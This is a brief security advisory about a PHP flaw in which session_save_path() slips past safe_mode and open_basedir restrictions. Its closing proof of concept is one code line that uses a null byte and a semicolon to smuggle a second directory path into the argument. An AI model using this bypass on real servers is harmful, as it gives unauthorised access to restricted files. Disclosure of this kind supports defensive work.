PHP Session.Save_Path() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability

PHP Session.Save_Path() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability

Attackers may exploit these issues with standard PHP code.

The following proof of concept is available:

session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")